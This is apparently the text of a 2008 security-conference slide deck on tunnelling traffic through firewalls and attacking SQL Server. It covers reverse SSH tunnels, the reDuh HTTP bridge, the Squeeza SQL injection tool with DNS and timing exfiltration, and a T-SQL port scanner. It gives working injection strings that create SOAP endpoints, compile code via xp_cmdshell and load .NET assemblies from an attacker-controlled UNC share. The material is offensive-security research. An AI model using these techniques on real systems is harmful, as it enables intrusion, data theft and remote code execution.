Pushing a Camel through the eye of the Needle!

[Funneling Data in and out of Protected Networks]

SensePost 2008
About:us

• SensePost
  – Specialist Security firm based in South Africa;
  – Customers all over the globe;
  – Talks / Papers / Books
• {marco, haroon}@sensepost.com
  – Spend most of our time breaking stuff ((thinking about breaking stuff) or playing foosball!)
• What this talk is about? (Hint: not foosball!)
What this talk is about?
A progression of Attacks

• A brief trip to the past (1601-1990)
• Un-firewalled access to victim host
• And also un-firewalled to rest of the network!
History (Continued.)

- The Introduction of firewalls..
- The failure to filter outbound traffic (circa 2000)
- CommandExec.[asp|jsp|php|*]

{The need for a comfortable Channel}
History (Continued.)

• Creating binaries on remote victim.
• debug.exe and friends
• upload.asp (and friends)
• Win32 Port Binding (1998)
Remote Exec (with feeling!)

• We really needed to use the words AJAX and XMLHttpRequest object to qualify as a web 2.0 talk.

• We will still add XML, SOAP and a tool with no vowels in its name (watch for this!)
Time to pivot™

- This stuff is ancient history.
- Sp_quickkill
- Extreme nc usage
- SensePost tcpr / Foundstoneport (Circa 2000)

- XP and IPV6!
- Ssh tunnel
SSH Tunnels (a)

- SSH Tunnels are old hat (too)
- Many people use the familiar –L switch to connect to other hosts near the box running sshd:

  - Gives us an encrypted tunnel to our target network...
  - but this isn't:

  - A) the problem we set out to solve
  - B) particularly helpful right now
SSH Tunnels (b)

• Instead lets look at –R
• So all we need is an ssh client on the remote machine, an SSHD on one of ours and we are in the game!

```
ssh -R [bind_address:]port:host:hostport
```

<table>
<thead>
<tr>
<th>Local machine</th>
<th>ssh -R</th>
<th>Target runs sshd</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td></td>
<td>(Target runs sshd)</td>
</tr>
<tr>
<td></td>
<td></td>
<td>Proxy connection from target:55555 to local machine:445</td>
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</tbody>
</table>

• putty + plink FTW!
Interlude (dns2tcp)

• Available from:  
  http://www.hsc.fr/ressources/outils/dns2tcp/

• Perfect for homes away from home
• Perfect for stealing wifi access
A good marriage (sshtun + dnstun)
Layer 2 bridges

- If you aren’t going to the network, bring the network to you
- If you’re bridging the network, make it protocol independent
- Requires inbound or outbound connection ability
Layer 2 bridges

• Pros
  – Clean interface to network
  – Not port or connection dependent, protocol independent
  – Simple to setup and use

• Cons
  – Death by firewall
  – Requires external deps (pcap,libnet)

• Examples
  – Tratt by Olleb (www.toolcrypt.org)
  – MyNetwork by Greg Hoglund (www.rootkit.com)
A Brief Recap

• We used to be able to hit everything we wanted to.
• We were happily redirecting traffic when firewalls were more forgiving
• Outbound Access Made us amazingly happy.
• Network level bridging was cool but the rules are changing.
• Can we do this completely over HTTP / HTTPS?
Introducing glenn.jsp

• (Working title)
  a) We can hit our target on port 80 (or 443)
  b) Ability to upload / create a web page on the target [example: JMX Console]
  c) Network level filtering is tight.
  d) Possible reverse proxies in-between

• [a],[b],[c],[d] meet [one smart intern]
ReDuh.jsp

- Written by Glenn Wilkinson (glenn@sensepost.com)
- Upload / Create .JSP page on server
- Fire-up local proxy (localhost:1234)
- Tell web-page to create web-bridge to internal_host:3389
  - JSP creates socket to internal_host:3389
  - JSP creates queues to handle internal comms.
- Attacker aims RDC client at local proxy on 127.0.0.1:1234
  - Local endpoint accepts traffic, converts packets to base-64 encoded POST messages.
  - Packets are POSTed to .JSP page
- JSP Page decodes packets, queues for delivery via created socket.
  - Return traffic is queued, encoded as base64 and queued again.
- Proxy polls server for return packet data, recreates them as packets and re-feeds the local socket.
What this means..

- We have a simple TCP over HTTP/HTTPS implementation
- It requires the creation of a simple, single .JSP file on the target..
- Surely this isn’t .JSP specific?
- ian@sensepost.com ported this while cursing a lot to ASP.net
- gert@sensepost.com gave us the php version.
- Basically covers most of the common cases.. If we can create a web page, we can create a circuit..
Squeeza

- Released at BH USA 2007
- Advanced SQL injection tool (another one on the pile...), aimed at MS SQL
- Treated injection slightly differently
- Split content generation from return channel
  - Content generation
  - Supported multiple return channels
- Could mostly mix ‘n match content generation modes with return channels
Squeeza

• Content created (not the interesting part)
  – Command execution: xp_cmdshell (old faithful)
  – Data extraction: select name from sysobjects where xtype='U'
  – File download: bulk insert ... from ‘c:\blah.txt’

• Return channels (more interesting part)
  – DNS
  – Timing
  – HTTP Error-based (ala Automagic SQL Injector)

• Return channels NOT supported
  – Inline HTML extraction
  – Standard blind injection techniques
Squeeza process overview

Generate content using command execution, file copy or data extraction injection string

Store data in a temporary table inside SQL database

Extract data using return channel of choice: DNS, timing, SQL error messages

Not fast enough for real-time applications, but good enough for batch applications such as command execution, file copy etc. Don’t expect to relay VNC traffic.
Squeeza: DNS

- Weaponised SQL server content extraction through DNS queries
- Data broken up into chunks, encoded and emitted through DNS
- Which meant:
  - Entire DNS channel handled in SQL
  - Elevated privs not required (but used if available)
  - Provided reliability guarantees, since client had complete control over what was requested and received
- Compare to SQLNinja (awesome tool, DNS not so much)
  - requires binary upload+cmd execution
  - reliability guarantee is ‘try again’, as client can’t control remote binary
  - however, does provide own ‘fake’ dns server
### Basic setup:

Attacker has SQL injection vulnerability into SQL server as "sa"

Command is run on SQL server

Output is produced

Output is stored in DB

Grab limited chunk of data from temporary table, convert to hex, tack on domain

Initiate DNS request with encoded data

Request is received and converted into original form
Squeeza: timing

• Weaponised SQL server content extraction through timing attacks
• Data broken up into chunks, bits extracted one at a time through timing differences
• Which meant:
  – Didn’t need an explicit return channel
  – Not absolutely reliable, but good enough
  – Many cups of coffee
Profiling SQL servers

- We want to know which SQL server version we’re dealing with
- Features added and removed between releases
  - 2000 added ????
  - 2005 removed xp_execresultset
  - 2005 added stored procedure creation functionality
- Common problem with a number of solutions
  - select @@version, choose return channel
- What about other methods?
  - Look for new/removed tables/stored procs/users
  - Look for new SQL syntax
Squeeza future

• Seems too nice to forget
• Not enough uptake
• Maybe piggyback onto Metasploit??
• What would this require?
This OLE’ thing

• In 2002, Chris Anley’s paper discussed OLE object instantiation and execution from T-SQL
  – Demo’ed file reading/writing, shell execution
  – Maybe this got lost in the rest of the goodness
• How many SQL injection tools ignore OLE attacks?
  – ????????????
• Is it because of privs?
  – Hmmmmm, sp_oacreate, sp_oamethod require execute on those methods
• Complexity?
  – Regular injections used by other tools create/execute stored procs all the time
• Payload size?
  – Again, current tools are no super packers
Growing OLE’ together

• In 6 years, not much has changed
• We can still use OLE objects (another route for ActiveX object exploitation?)
• Why this route?
  – Safe for scripting
  – Killbits
• We think OLE integration deserves much more focus in injection payloads
Something OLE’, something new

Example of a usable new OLE payload

SQL-based port scanner
SQL port scanner

• Basis is “MSXML2.ServerXMLHTTP” object
• Used to retrieve XML data from a webserver
• Installed with IE, IIS,
  – Two versions on win2k3
• We can specify then IP:port of the target webserver
• Return values differ depending on whether a webserver is listening or not
SQL port scanner

• We can tell if ports are open or closed/filtered
• Even better, basic protocol fingerprinting since we’re also told if a legitimate webserver answered
• But how to differentiate between closed and filtered?
• Same way everyone else does (mostly)
  – Timing and timeouts
  – setTimeouts
CREATE PROCEDURE probeip @host VARCHAR(50), @port VARCHAR(5) AS

-- Create URI from ip and port
DECLARE @s varchar(60)
set @s='http://'+@host+':'+@port+'/'+

-- Instantiate OLE control
EXEC sp_OACreate 'MSXML2.ServerXMLHTTP', @o OUT

-- Configure control timeouts
EXEC @rop = sp_OAMethod @o, 'setTimeouts' NULL 3000 3000

-- Initialise control (capture return code)
EXEC @rop = sp_OAMethod @o, 'open', NULL, 'GET',@s

-- Send request (capture return code)
EXEC @rse = sp_OAMethod @o, 'send'

-- Grab HTTP status
EXEC sp_OAGetProperty @o, 'status', @status OUT

-- Test return codes and determine port status
SELECT @s+CASE @rop WHEN -2147012891 THEN 'Blocked' WHEN 0 THEN CASE @rse WHEN -2147012744 THEN 'Open' WHEN 0 THEN 'Open/WWW' WHEN -2147012867 THEN 'Closed' WHEN -2147012894 THEN 'Filtered' WHEN -2147012851 THEN 'Open/WWWR' ELSE 'Invalid' END END

END

Basic probe stored procedure
Putting it together

• Using the probeIP() building block, we can build further tools

• Port sweepers
  – scanports(ip, portlist)

• Portscanners
  – scanhosts(iplist, port)

• Webserver detectors
So what does that give us?

- A SQL-based port scanner
- Implemented in a stored proc
- Can scan almost all ports
- Supports HTTP detection
- But why?
  - No messy nmap uploads
  - No A/V footprints
What’s going to trip us up?

• Inter-protocol protections
  – Cross-protocol attacks have been around for a while
  – Been getting a bit of attention again
  SandroGauci provided a short paper recently enumerating browser support
  – Browsers provide protection by banning connections to specific ports
  – FF bans 58, Opera bans 58, Safari bans 43
  – IE 7 bans 6 ports, IE 6 banned 5 ports, IE 5 didn’t ban at all
  – More of a stumble than a trip, all the interesting ports are still allowed

• Proxies
  – setProxy can disabled proxy requests

• Speed
  – Stats??????
Squeezing OLE juice

• Turns out, sometimes we make the right decision
• Integrating with Squeeza is simple
  – Portscanner generates content
  – Can pull results through dns, timing or http errors
OLE dog, new tricks

- OLE objects deserve lots more looking at
- Why bother with debug scripts, when a combination of T-SQL and ‘scripting.filesystemobject’ can write anything to disk?
- Why bother with xp_cmdshell, when ‘scripting.shell’ works just as well regardless of whether the stored proc is available
- Importantly, this functionality is available across multiple SQL server versions, making attacks version independent
SQL2005 – Pen Tester Nightmare?

• By all accounts SQL 2005 is Microsoft’s SDLC flagship product

• SQL Server poses some unique challenges:
  – Highly Public;
  – Highly Exploited;
  – Not really directly through Microsoft’s fault!

• They had to take steps to reduce attack surface, to stop people hurting themselves (think mandatory seat-belts in cars)

• Much touted SD3 – Secure by Design, Secure by Default, Secure by Deployment

• Famous hax0r celebrities have stated how they hate coming up against SQL05 on deployed applications..
I call Shenanigans!
Fundamental problems with ‘05

• Microsoft needed desperately to reduce the attack surface on SQL05.

• 1000 stored procedures available in a default (SQL7) install?

• Much publicized lock-down of superfluous functionality and features.

• This however has 2 major problems
The 2 Big Problems

• Mixed Messages: Incoherent at best and Dishonest at worst.

• Any software engineer will tell you that Features will win because of “dancing pigs” and “management by in-flight magazine”.
The 2 Big Problems


2. In-Band Signaling:
   - This mistake is so old, it almost hurts to write it.
   - Cap’n Crunch vs. Telephone Systems
   - Buffer Overflows and Von Neumann Architectures

• SQL Server 2005 makes heavy use of in-band signaling.
• Secure by design?
InBand Signaling++ (sp_configure)

• Early Microsoft documentation on SQL Best Practice mentioned disabling `xp_cmdshell`.
  — Every one of the (many) SQL Injection tools out there uses `sp_configure` to re-enable `xp_cmdshell`.
  — This is an old lesson for SQL Server to learn!

• In fact _all_ of the features widely screamed to be locked down, can be re-enabled within the same channel. (the same channel that SQL Injection rides in on!)

• This shared channel for configuration/administration obviously buys us some convenience, but a secure design?
sp_configure; RECONFIGURE

• Ad Hoc Distributed Queries
  – (used by many tools to brute-force sa password)
  – (used by many tools for effective data extrusion – SQL DataThief)

• xp_cmdshell
  – Almost as famous as ‘ or 1=1--

• CLR Integration
  – The gateway to much fun..

• In-band signals FTW!
SQL2005 – Some new features

• Other than old favorites, we are going to look at 2 new ones:
  – Native XML Web Services;
  – CLR Integration.
Native XML Integration

• The marketing pitch:

“Microsoft SQL Server 2005 provides a standard mechanism for accessing the database engine using SOAP via HTTP. Using this mechanism, you can send SOAP/HTTP requests to SQL Server”...” Since the SOAP/HTTP access mechanism is based on well-known technologies such as XML and HTTP, it inherently promotes interoperability and access to SQL Server in a heterogeneous environment. Any device that can parse XML and submit HTTP requests can now access SQL Server.”

• Native Soap Integration and the wiley hacker
  – Web Server DoS?
  – Comfortable X-Platform Query Manager?
Web-Server DoS

- Denial of Service is boring!
- But boring will hurt you just as badly as anything else..
Web-Server DoS

- SQLServer now interacts directly with http.sys in the Win2k3 kernel to manage created endpoints.
- When included within a standard ‘CREATE ENDPOINT’ call, MSDN is quite specific: “while the SQL Server-based application is running, any HTTP requests to this endpoint are forwarded to the instance of SQL Server.”

1. 2. 3.

This could have been an important page!
But surely this needs privs?

• This _had_ to come up with threat modeling.
  – Secure marketing docs mention: “Both the Windows account and the SQL Server account that SQL Server 2005 impersonates must have local Windows administrator privileges for the HTTP endpoint registration to succeed.”

• Bah! Sounds like we are out of luck..
  – MSDN (again): “If you execute the statement in the context of a SQL Server account, for example, sa or some other SQL Server login, SQL Server 2005 impersonates the caller by using the SQL Service account, specified when SQL Server is installed, to register the endpoint with HTTP.SYS.”

• Ah.. So all we need is to be SA / in sysadmin (will that ever happen??
SA == DoS on every IIS Instance?

- IIS Server running multiple sites (using name based or IP based virtual hosting)
- SQL Service account given FileSystem restrictions to ensure that SQL DBA cant deface / affect other customer sites.

CREATE ENDPOINT endpoint1
            STATE = [STARTED]
AS HTTP
       (PATH = '/sql_demo',
       AUTHENTICATION = (INTEGRATED),
       PORTS = (CLEAR),
       SITE = '.*'

[SITE = { '.*' | '+' | 'website' }]

- Sounds like “NT Port bind, 10 years later..”
Creating endpoints for fun and profit

1. `exec('CREATE FUNCTION getServerVersion() RETURNS NVARCHAR(MAX) AS BEGIN;RETURN (@@VERSION);END')--`

2. 

3. `exec('CREATE ENDPOINT eep STATE = STARTED AS HTTP (AUTHENTICATION = ( INTEGRATED ),PATH = '/sql/demoo',PORTS = ( CLEAR ))FOR SOAP (WEBMETHOD "getServerVersion"(NAME = "demo_db.dbo.getServerVersion"),BATCHES = ENABLED,WSDL = DEFAULT)')--`
Creating endpoints for fun and profit

• The vector here is obvious: We wanted to build a function or proc. That would accept arbitrary input from SOAP, then eval() it...

• But Microsoft beat us to it...
X-Platform Query Managers

• Did you notice the methods VisualStudio extracted from the WSDL?

```csharp
getServerVersion()
Sqlbatch(BatchCommands As string, Parameters As ArrayofParameters)
```

• MSDN: “When BATCHES are ENABLED on an endpoint by using the T-SQL command, another SOAP method, called "sqlbatch," is implicitly exposed on the endpoint. The sqlbatch method allows you to execute T-SQL statements via SOAP”
exec('CREATE ENDPOINT ep2 STATE=STARTED AS HTTP (AUTHENTICATION=(INTEGRATED),PATH="/sp",PORTS=(CLEAR)) FOR SOAP(BATCHES=ENABLED)')--
New: CLR Integration

• The thing that made squeeza difficult to write in ’07 was mainly T-SQL.
• T-SQL is Turing Complete but when trying to extract data from a network via encoded DNS packets or timing it starts to creak a little.. (we did it, but lost a lot of hair in the process)
• Microsoft to the rescue (msdn): “Microsoft SQL Server 2005 significantly enhances the database programming model by hosting the Microsoft .NET Framework 2.0 Common Language Runtime (CLR). This enables developers to write procedures, triggers, and functions in any of the CLR languages, particularly Microsoft Visual C# .NET, Microsoft Visual Basic .NET, and Microsoft Visual C++. This also allows developers to extend the database with new types and aggregates.”
• Huh?
• Turned off by default...
  – Remember slide on in-band signals & &sp_configurer =
  – *exec sp_configurer(clr enabled),1*
New: CLR Integration

• **Does** allow for very fine grained access control.

• Fortunately these can all be over-ridden if you have SA access.

• Simply it allows us to load an arbitrary .net Assembly into SQL Server, and depending on how we handle it, possibly execute this binary within SQL Servers address space.

• How do you load a .net assembly?
Loading .net Assemblies (csc)

- Create .cs file on filesystem (1)
- Call on csc.exe to compile the binary (2)
- Import the binary into SQL (3)
- Profit! (4)

```
exec master..xp_cmdshell "echo using System; >>\temp\test.cs"
exec master..xp_cmdshell "echo using System.Data; >>\temp\test.cs"
exec master..xp_cmdshell "echo using System.Data.SqlClient; >>\temp\test.cs"
exec master..xp_cmdshell "echo using Microsoft.SqlServer.SqlTypes; >>\temp\test.cs"
exec master..xp_cmdshell "echo using Microsoft.SqlServer.Server; >>\temp\test.cs"
exec master..xp_cmdshell "echo public partial class StoredProcedures >>>\temp\test.cs"
exec master..xp_cmdshell "echo { >>>\temp\test.cs"
exec master..xp_cmdshell "echo [SqlProcedure] >>>\temp\test.cs"
exec master..xp_cmdshell "echo public static void HelloWorld.StoredProcedure( ) >>>\temp\test.cs"
exec master..xp_cmdshell "echo { >>>\temp\test.cs"
exec master..xp_cmdshell 'echo SQLContext.Pipe.Send("Hello world.
\n"); >>>\temp\test.cs'
exec master..xp_cmdshell "echo } >>>\temp\test.cs"
exec master..xp_cmdshell "echo } >>>\temp\test.cs"
exec master..xp_cmdshell 'C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\csc /target:library /out:c:\temp\test.dll s:\temp\test.cs'
exec '{CREATE ASSEMBLY HelloWorld FROM "c:\temp\test.dll"}'
exec HelloWorldSP
```
Loading .net Assemblies (csc)

• There has been talk of ntsd and debug.exe being removed in default installs.
• Fortunately, we now have csc.exe shipping with every deployed SQL Server!
• csc.exe is perfectly predictable:
  – %windir%\system32\dllcache\csc.exe
• This is still pretty ghetto!
Loading .net Assemblies (UNC)

• Fortunately, like DLL’s this can be loaded from a UNC share too.

CREATE ASSEMBLY moo FROM '\\196.31.150.117\temp_smb\moo.dll'

• Profit!
• (Of course all of this is do-able via an injection point)
  • http://victim2k3.sp.com/login.asp?
    username=boo&password=boo'\CREATE\ASSEMBLY\moo\FROM'\\196.31.150.117\temp_smb\moo.dll'

• But this still requires outbound \UNC (which is still useful for squeeza and DNS resolution), but remains ghetto!
Loading .net Assemblies (0x1618..)

- T-SQL Syntax allows the assembly to be created at runtime from the files raw hex.

1. File.open("moo.dll","rb").read().unpack("H*")

⇒ ["4d5a900003000000040000000fff0......]

2. CREATE ASSEMBLY moo FROM 0x4d5a90000300....

3. exec HelloWorldSP (Profit!)

- This makes creation via injection even easier!
Assemblies and Security Privs.

• Your created binary is by default placed inside a sand-box
• Assemblies are loaded as:
  – SAFE [Calculations, No external Resources]
  – EXTERNAL_ACCESS [Access to Disk, Environment, Almost everything with some restrictions]
  – UNSAFE [God Help You! | Equivalent of Full Trust | Call unmanaged Code / Do Anything as SYSTEM]
• UnSafe Assemblies must be signed with a new CLR Signing procedure or
• SA can set the Database to “Trustworthy”

```sql
alter database master set Trustworthy on
CREATE ASSEMBLY shoe FROM 0x4d5a90.. WITH PERMISSION_SET = unsafe
```
What can we do with this?

• The fun is just beginning:
  – Effectively loading binaries into memory without noticeably affecting disk in an unusual manner!
  – .net assembly to launch calc.exe (as System)
  – .net assembly to launch remote shell (System)
  – Squeeza without the horrible T-SQL 😕
  – reDuh.clr. sql😊
[1] SQL Injection used to create CLR reDuh.exe on SQL Server

[2] Local Proxy breaks down TCP packets, submits to reDuh through SQL Injection strings..

[3] reDuh clr extracts packet info and submits packets to destination

[4] Return packets are encoded by reDuh within SQL server, and fetched by the attackers proxy using Injection vector, completing the circuit.
Questions ?
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